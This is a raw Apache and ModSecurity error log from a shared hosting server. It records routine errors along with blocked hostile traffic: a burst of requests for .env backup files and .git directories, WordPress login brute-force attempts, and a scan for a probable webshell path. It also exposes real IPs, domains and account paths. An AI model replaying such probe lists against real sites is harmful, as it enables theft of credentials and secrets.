[Tue May 26 17:58:44.319343 2026] [security2:error] [pid 946381:tid 946615] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR-9iTu5WG4Dm5WpoHxQAAAGg"]
[Tue May 26 17:58:44.820808 2026] [authz_core:error] [pid 946381:tid 946552] [client 208.84.100.82:13250] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.swp
[Tue May 26 17:58:44.820854 2026] [authz_core:error] [pid 946381:tid 946599] [client 208.84.100.82:13316] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.swp
[Tue May 26 17:58:44.820906 2026] [authz_core:error] [pid 946381:tid 946544] [client 208.84.100.82:13266] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.bak
[Tue May 26 17:58:44.821069 2026] [authz_core:error] [pid 946381:tid 946534] [client 208.84.100.82:13254] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.orig
[Tue May 26 17:58:44.821637 2026] [authz_core:error] [pid 946381:tid 946571] [client 208.84.100.82:13296] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.save
[Tue May 26 17:58:44.821753 2026] [authz_core:error] [pid 946381:tid 946565] [client 208.84.100.82:13276] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.old
[Tue May 26 17:58:44.822298 2026] [authz_core:error] [pid 946381:tid 946579] [client 208.84.100.82:13228] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.save
[Tue May 26 17:58:44.822542 2026] [authz_core:error] [pid 946381:tid 946514] [client 208.84.100.82:13168] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.822699 2026] [authz_core:error] [pid 946381:tid 946618] [client 208.84.100.82:13234] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env~
[Tue May 26 17:58:44.823132 2026] [authz_core:error] [pid 946381:tid 946549] [client 208.84.100.82:13264] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.copy
[Tue May 26 17:58:44.823172 2026] [authz_core:error] [pid 946381:tid 946570] [client 208.84.100.82:13184] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.823202 2026] [authz_core:error] [pid 946381:tid 946518] [client 208.84.100.82:13170] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.823451 2026] [authz_core:error] [pid 946381:tid 946554] [client 208.84.100.82:13324] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.orig
[Tue May 26 17:58:44.823871 2026] [authz_core:error] [pid 946381:tid 946545] [client 208.84.100.82:13308] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production~
[Tue May 26 17:58:44.824161 2026] [authz_core:error] [pid 946381:tid 946564] [client 208.84.100.82:13214] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.old
[Tue May 26 17:58:44.824300 2026] [authz_core:error] [pid 946381:tid 946608] [client 208.84.100.82:13128] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.save
[Tue May 26 17:58:44.824407 2026] [authz_core:error] [pid 946381:tid 946567] [client 208.84.100.82:13140] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local~
[Tue May 26 17:58:44.824782 2026] [authz_core:error] [pid 946381:tid 946533] [client 208.84.100.82:13192] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.824957 2026] [authz_core:error] [pid 946381:tid 946544] [client 208.84.100.82:13156] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.825104 2026] [authz_core:error] [pid 946381:tid 946559] [client 208.84.100.82:13220] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.backup
[Tue May 26 17:58:44.825142 2026] [authz_core:error] [pid 946381:tid 946631] [client 208.84.100.82:13198] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.git
[Tue May 26 17:58:44.825457 2026] [authz_core:error] [pid 946381:tid 946512] [client 208.84.100.82:13202] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.bak
[Tue May 26 17:58:44.827248 2026] [authz_core:error] [pid 946381:tid 946628] [client 208.84.100.82:13290] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.backup
[Tue May 26 17:58:44.910255 2026] [authz_core:error] [pid 946381:tid 946522] [client 208.84.100.82:54418] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.old
[Tue May 26 17:58:45.011953 2026] [authz_core:error] [pid 946381:tid 946616] [client 208.84.100.82:54462] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.backup
[Tue May 26 17:58:45.069315 2026] [autoindex:error] [pid 946381:tid 946598] [client 152.58.35.38:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home/announcement_pages/7
[Tue May 26 17:58:46.606293 2026] [security2:error] [pid 946381:tid 946599] [client 173.252.127.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWR_tiTu5WG4Dm5WpoILAAAAFg"], referer: https://www.kardashevtechnologies.com/?fbclid=IwZXh0bgNhZW0CMTEAc3J0YwZhcHBfaWQMMjU2MjgxMDQwNTU4AAEeQJcpnsJA8_apoHzYW432ssd-cOJ06fmPTAmC-l6eEu9vTdgOnD1fkY1rBbs_aem_-LbbiJp7q-Kqo4U1oD-PVg
[Tue May 26 17:58:47.052569 2026] [security2:error] [pid 946381:tid 946591] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR_tiTu5WG4Dm5WpoIQgAAAFA"]
[Tue May 26 17:58:47.359237 2026] [security2:error] [pid 946381:tid 946516] [client 173.252.127.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWR_9iTu5WG4Dm5WpoIXQAAAAU"], referer: https://www.kardashevtechnologies.com/about-us/
[Tue May 26 17:58:47.820228 2026] [security2:error] [pid 946381:tid 946500] [remote 54.184.226.94:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "kingsclub.in"] [uri "/"] [unique_id "ahWR_9iTu5WG4Dm5WpoIbQAAdnY"], referer: http://kingsclub.in
[Tue May 26 17:58:49.512244 2026] [security2:error] [pid 946381:tid 946597] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSAdiTu5WG4Dm5WpoIlQAAAFY"]
[Tue May 26 17:58:50.012366 2026] [autoindex:error] [pid 946381:tid 946586] [client 152.58.35.38:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/home/announcement_pages/home/inquiry
[Tue May 26 17:58:50.287680 2026] [security2:error] [pid 946381:tid 946578] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSAdiTu5WG4Dm5WpoIsAAAAEM"]
[Tue May 26 17:58:50.568644 2026] [security2:error] [pid 946381:tid 946619] [client 54.184.226.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWR_9iTu5WG4Dm5WpoIcQAAbCQ"], referer: https://sucuri.net
[Tue May 26 17:58:50.581527 2026] [security2:error] [pid 946381:tid 946574] [client 54.184.226.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWR_9iTu5WG4Dm5WpoIbwAAPzI"], referer: https://sucuri.net
[Tue May 26 17:58:50.625510 2026] [security2:error] [pid 946381:tid 946635] [client 54.184.226.94:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWR_9iTu5WG4Dm5WpoIbgAAfCk"], referer: https://www.google.com/url/?sa=t
[Tue May 26 17:58:50.923589 2026] [autoindex:error] [pid 946381:tid 946460] [remote 54.184.226.94:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:58:51.698938 2026] [security2:error] [pid 946381:tid 946615] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSA9iTu5WG4Dm5WpoI6QAAAGg"]
[Tue May 26 17:58:52.865213 2026] [security2:error] [pid 946381:tid 946461] [remote 50.6.192.190:51430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSBNiTu5WG4Dm5WpoJCwAAIk8"]
[Tue May 26 17:58:53.729854 2026] [security2:error] [pid 946381:tid 946453] [remote 50.6.192.190:51430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSBdiTu5WG4Dm5WpoJLAAAMEc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:58:54.617128 2026] [security2:error] [pid 946381:tid 946588] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSBtiTu5WG4Dm5WpoJQQAAAE0"]
[Tue May 26 17:58:54.943072 2026] [security2:error] [pid 946381:tid 946571] [client 173.252.127.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWSBtiTu5WG4Dm5WpoJUQAAADw"], referer: https://www.kardashevtechnologies.com/contact/
[Tue May 26 17:58:55.027979 2026] [security2:error] [pid 946381:tid 946486] [remote 46.62.185.67:38512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWSBtiTu5WG4Dm5WpoJUgAAK2g"]
[Tue May 26 17:58:56.885368 2026] [security2:error] [pid 946381:tid 946606] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSCNiTu5WG4Dm5WpoJdAAAAF8"]
[Tue May 26 17:59:00.009672 2026] [security2:error] [pid 946381:tid 946531] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSC9iTu5WG4Dm5WpoJzwAAABQ"]
[Tue May 26 17:59:00.089117 2026] [security2:error] [pid 946381:tid 946395] [remote 74.7.241.58:36712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWSDNiTu5WG4Dm5WpoJ3AAAaQ0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 17:59:00.457351 2026] [core:error] [pid 946381:tid 946522] [client 104.168.98.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:59:00.457378 2026] [core:error] [pid 946381:tid 946522] [client 104.168.98.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:59:01.103205 2026] [core:crit] [pid 946381:tid 946611] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:01.178076 2026] [core:crit] [pid 946381:tid 946529] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:01.844399 2026] [security2:error] [pid 946381:tid 946625] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSDdiTu5WG4Dm5WpoKEwAAAHI"]
[Tue May 26 17:59:02.226786 2026] [security2:error] [pid 946381:tid 946587] [client 152.58.35.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWSDtiTu5WG4Dm5WpoKOQAAAEw"], referer: https://www.ucdc.co.in/
[Tue May 26 17:59:02.238121 2026] [autoindex:error] [pid 946381:tid 946523] [client 152.58.35.38:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:59:04.506026 2026] [security2:error] [pid 946381:tid 946574] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSENiTu5WG4Dm5WpoKZwAAAD8"]
[Tue May 26 17:59:05.589085 2026] [security2:error] [pid 946381:tid 946524] [client 167.160.65.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSEdiTu5WG4Dm5WpoKjAAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:59:07.181794 2026] [security2:error] [pid 946381:tid 946609] [client 167.160.65.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSE9iTu5WG4Dm5WpoKrgAAAGI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 17:59:07.683874 2026] [security2:error] [pid 946381:tid 946443] [remote 31.24.155.180:35634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWSE9iTu5WG4Dm5WpoKuAAAbT0"]
[Tue May 26 17:59:07.942728 2026] [security2:error] [pid 946381:tid 946622] [client 45.205.1.28:63384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xllent.in"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahWSE9iTu5WG4Dm5WpoKyAAAAG8"]
[Tue May 26 17:59:08.179782 2026] [security2:error] [pid 946381:tid 946578] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSE9iTu5WG4Dm5WpoKxwAAAEM"]
[Tue May 26 17:59:09.170735 2026] [security2:error] [pid 946381:tid 946584] [client 14.236.206.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSFNiTu5WG4Dm5WpoK3QAAAEk"]
[Tue May 26 17:59:10.157002 2026] [security2:error] [pid 946381:tid 946528] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSFdiTu5WG4Dm5WpoK-QAAABE"]
[Tue May 26 17:59:11.216294 2026] [security2:error] [pid 946381:tid 946458] [remote 103.11.102.106:54092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWSF9iTu5WG4Dm5WpoLFQAADEw"]
[Tue May 26 17:59:11.306220 2026] [security2:error] [pid 946381:tid 946465] [remote 194.213.4.139:34378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSF9iTu5WG4Dm5WpoLFgAAY1M"]
[Tue May 26 17:59:12.847573 2026] [security2:error] [pid 946381:tid 946563] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSGNiTu5WG4Dm5WpoLOAAAADQ"]
[Tue May 26 17:59:13.409815 2026] [security2:error] [pid 946381:tid 946461] [remote 194.213.4.139:34378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.4.213.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSGdiTu5WG4Dm5WpoLTQAAIU8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:59:14.206816 2026] [security2:error] [pid 946381:tid 946584] [client 40.77.167.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWSGtiTu5WG4Dm5WpoLXwAAAEk"]
[Tue May 26 17:59:14.656689 2026] [security2:error] [pid 946381:tid 946487] [remote 160.242.199.210:34770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.199.242.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWSGtiTu5WG4Dm5WpoLZwAAB2k"]
[Tue May 26 17:59:15.408918 2026] [security2:error] [pid 946381:tid 946488] [remote 167.172.25.98:37962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWSG9iTu5WG4Dm5WpoLegAAFGo"]
[Tue May 26 17:59:15.462525 2026] [security2:error] [pid 946381:tid 946564] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSG9iTu5WG4Dm5WpoLdQAAADU"]
[Tue May 26 17:59:16.623340 2026] [security2:error] [pid 946381:tid 946472] [remote 129.121.76.191:36848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSHNiTu5WG4Dm5WpoLlgAAXVo"]
[Tue May 26 17:59:16.975162 2026] [security2:error] [pid 946381:tid 946388] [remote 129.121.76.191:36848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSHNiTu5WG4Dm5WpoLqQAAGwY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:59:18.006834 2026] [security2:error] [pid 946381:tid 946588] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSHdiTu5WG4Dm5WpoLswAAAE0"]
[Tue May 26 17:59:19.753771 2026] [security2:error] [pid 946381:tid 946382] [remote 160.242.199.210:34770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.199.242.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWSH9iTu5WG4Dm5WpoL5gAAPAA"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 17:59:20.062567 2026] [security2:error] [pid 946381:tid 946600] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSH9iTu5WG4Dm5WpoL4gAAAFk"]
[Tue May 26 17:59:21.736490 2026] [security2:error] [pid 946381:tid 946386] [remote 31.24.155.180:47202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWSIdiTu5WG4Dm5WpoMEQAABwQ"], referer: https://friendsalongtheway.net/wp-login.php
[Tue May 26 17:59:22.967068 2026] [security2:error] [pid 946381:tid 946624] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSItiTu5WG4Dm5WpoMIAAAAHE"]
[Tue May 26 17:59:25.840153 2026] [security2:error] [pid 946381:tid 946617] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSJdiTu5WG4Dm5WpoMZAAAAGo"]
[Tue May 26 17:59:28.588316 2026] [security2:error] [pid 946381:tid 946557] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSKNiTu5WG4Dm5WpoMqAAAAC4"]
